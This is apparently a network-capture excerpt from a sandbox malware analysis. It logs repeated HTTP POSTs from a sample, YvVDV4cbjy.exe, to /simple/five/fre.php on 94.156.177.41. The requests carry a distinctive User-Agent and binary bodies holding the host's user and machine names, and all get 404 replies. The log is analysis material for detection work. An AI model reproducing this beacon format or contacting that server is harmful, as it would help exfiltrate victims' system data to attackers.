Jan 11, 2025 07:45:30.117988110 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:30.122845888 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:30.838104010 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50051	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:30.986568928 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:30.991477966 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:31.709183931 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50052	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:31.852391005 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:31.859651089 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:32.578874111 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50053	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:32.736176014 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:32.741029024 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:33.462277889 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50054	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:33.602154970 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:33.607085943 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:34.323070049 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50055	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:34.482917070 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:34.487775087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:35.186527014 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50056	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:35.339809895 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:35.345550060 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:36.073331118 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50057	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:36.519268990 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:36.525051117 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:37.239743948 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50058	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:37.395136118 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:37.400062084 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:38.251296997 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50059	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:38.405960083 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:38.410806894 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:39.138231039 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50060	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:39.297456026 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:39.302387953 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:40.007410049 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50061	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:40.159339905 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:40.165796041 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:40.856905937 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50062	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:41.010130882 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:41.015054941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:41.732707024 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50063	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:42.027710915 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:42.032602072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:42.753599882 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50064	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:42.900111914 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:42.904942036 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:43.607815027 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50065	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:43.756759882 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:43.761689901 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:44.450850010 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50066	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:44.716214895 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:44.721123934 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:45.428601027 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50067	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:45.585752010 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:45.593770027 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:46.295394897 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50068	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:46.445966005 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:46.450872898 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:47.179929018 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50069	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:47.335490942 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:47.341626883 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:48.061913013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50070	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:48.217773914 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:48.223334074 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:48.926311970 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50071	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:49.098901033 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:49.103766918 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
